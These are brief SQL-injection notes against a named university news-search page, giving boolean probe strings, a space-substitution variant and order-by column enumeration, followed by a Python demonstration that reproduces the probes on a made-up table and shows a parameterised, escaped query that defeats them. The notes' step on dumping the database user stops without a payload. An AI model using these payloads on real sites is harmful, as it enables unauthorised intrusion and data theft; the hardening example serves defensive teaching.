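1. Detection: keyword%' and 1=1 and '%'=' returns a normal page
keyword%' and 1=2 and '%'=' returns an error
%%%' and 1=1# space-substitution method
2. Find the keyword parameter
For POST requests you have to capture the packet: (put the variable at the very end and the request can be handed straight to a tool)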
http://zhaojiu.jxau.edu.cn/Web_News/Search.asp?style=3&keyWord=江西
Enumerate the number of columns: 冬%' order by 1-- and '%'=' or: 冬%' order by 1 and '%'='
3. Construct the SQL injection:
Dump the current database user name: /Web_News/Search.asp?style=3&keyWord=
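
Why the 1=1 / 1=2 pair in step 1 gives different pages, and what removes the difference, shown as an added example (not code from the original notes or from the site). It assumes the search page concatenates keyWord into a LIKE '%...%' clause; SQLite stands in for the real database, and the table, data and function names are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample rows standing in for the news table behind the search page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO news (title) VALUES (?)",
                   [("江西 campus news",), ("Library notice",), ("100% attendance",)])
    return db

def search_concat(db, keyword):
    # Vulnerable pattern: the keyword is pasted inside LIKE '%...%',
    # so a quote in the keyword ends the string and the rest runs as SQL.
    sql = "SELECT title FROM news WHERE title LIKE '%" + keyword + "%'"
    return [row[0] for row in db.execute(sql)]

def escape_like(keyword):
    # Make %, _ and the escape character itself literal inside a LIKE pattern.
    return (keyword.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))

def search_bound(db, keyword):
    # Hardened pattern: the SQL text is fixed and the keyword is bound as data.
    sql = "SELECT title FROM news WHERE title LIKE ? ESCAPE '\\'"
    pattern = "%" + escape_like(keyword) + "%"
    return [row[0] for row in db.execute(sql, (pattern,))]

def probe_results(search):
    # The two detection strings from step 1, with 江西 as the keyword.
    db = make_db()
    true_probe = "江西%' and 1=1 and '%'='"
    false_probe = "江西%' and 1=2 and '%'='"
    return search(db, true_probe), search(db, false_probe)

if __name__ == "__main__":
    print("concatenated:", probe_results(search_concat))
    print("bound:       ", probe_results(search_bound))
```

With the concatenated query the two probes return different result sets, which is the signal step 1 relies on; with the bound query both probes are treated as literal text and return the same empty result.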